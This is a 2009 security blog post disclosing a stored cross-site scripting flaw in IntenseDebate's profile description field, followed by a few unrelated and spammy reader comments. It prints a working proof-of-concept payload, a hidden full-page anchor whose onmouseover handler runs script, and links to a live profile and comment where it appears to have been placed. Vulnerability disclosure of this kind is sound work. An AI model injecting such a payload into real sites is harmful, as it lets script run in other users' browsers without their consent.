This site is soon to be deprecated by http://www.johnleitch.net

Friday, September 25, 2009

Persistent XSS Vulnerability - IntenseDebate.com

The profile description field of Intense Debate has a type 2 XSS vulnerability. Using it, arbitrary code can be run when the affected profile is viewed or when the mouse cursor is over the avatar present next to comments posted by the account.





<a style="position:absolute;top:-500px;left:-500px;width:9999px;height:9999px;" onmouseover="alert(0)"></a>

http://intensedebate.com/people/JohnnyCake5

http://www.woodtv.com/dpp/your_money/wall_street/Stocks_End_Low_As_Healthcare_Recovers_2887663#IDComment35942133
Posted by John Leitch at 2:45 PM
Labels: , , , , , , , , , ,

4 comments:

  1. low energy pcAugust 23, 2011 at 4:19 AM

    Thanks for the information,I get a better understanding about the issue.And Hope that you have more post for us to read.

    ReplyDelete
  2. Sun FlowerNovember 5, 2011 at 11:48 AM

    XSS vulnerabilities have been reported and exploited since the 1990s. Prominent sites affected in the past include the social-networking sites Twitter, Facebook, MySpace, and Orkut. In recent years, cross-site scripting flaws surpassed buffer overflows to become the most common publicly-reported security vulnerability, with some researchers viewing as many as 68% of websites as likely open to XSS attacks.

    norton promo bike shop melbourne

    ReplyDelete
  3. benha universityJuly 12, 2017 at 1:15 AM

    I'm very glade for recognize this site

    ReplyDelete
  4. nenafeaMay 15, 2022 at 10:27 AM

    best replica bags online 2018 replica bags wholesale mumbai replica nappy bags

    ReplyDelete

Subscribe to: Post Comments (Atom)